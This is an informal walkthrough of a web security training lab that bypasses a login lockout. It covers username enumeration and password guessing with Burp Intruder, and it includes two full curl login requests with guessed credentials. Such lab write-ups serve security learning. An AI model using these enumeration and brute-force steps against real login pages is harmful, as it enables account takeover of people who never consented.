

this site don't have any protection if username not exist in database 
so, hackers can username enumaretion and find password

curl -i -s -k -X $'POST' \
    -H $'Host: 0aff00a6034b63f18172cb42006d00d6.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 27' -H $'Origin: https://0aff00a6034b63f18172cb42006d00d6.web-security-academy.net' -H $'Referer: https://0aff00a6034b63f18172cb42006d00d6.web-security-academy.net/login' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' -H $'Sec-Gpc: 1' -H $'Te: trailers' -H $'Connection: keep-alive' \
    -b $'session=oLjql1zb2ApnSgR8oEgvFsOsGrKEIa4U' \
    --data-binary $'username=app1&password=test' \
    $'https://0aff00a6034b63f18172cb42006d00d6.web-security-academy.net/login'
	
after 5 req this user will ban
so we can find username

tihs time if 5 time send a wrong password we wiil block 
but if send a true useer and sort with length in burp intruder, you see pass don't show error massage :/

finally try this :

curl -i -s -k -X $'POST' \
    -H $'Host: 0aff00a6034b63f18172cb42006d00d6.web-security-academy.net' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 33' -H $'Origin: https://0aff00a6034b63f18172cb42006d00d6.web-security-academy.net' -H $'Referer: https://0aff00a6034b63f18172cb42006d00d6.web-security-academy.net/login' -H $'Upgrade-Insecure-Requests: 1' -H $'Sec-Fetch-Dest: document' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-User: ?1' -H $'Sec-Gpc: 1' -H $'Te: trailers' -H $'Connection: keep-alive' \
    -b $'session=oLjql1zb2ApnSgR8oEgvFsOsGrKEIa4U' \
    --data-binary $'username=app1&password=1234567890' \
    $'https://0aff00a6034b63f18172cb42006d00d6.web-security-academy.net/login'
	
and we are in :))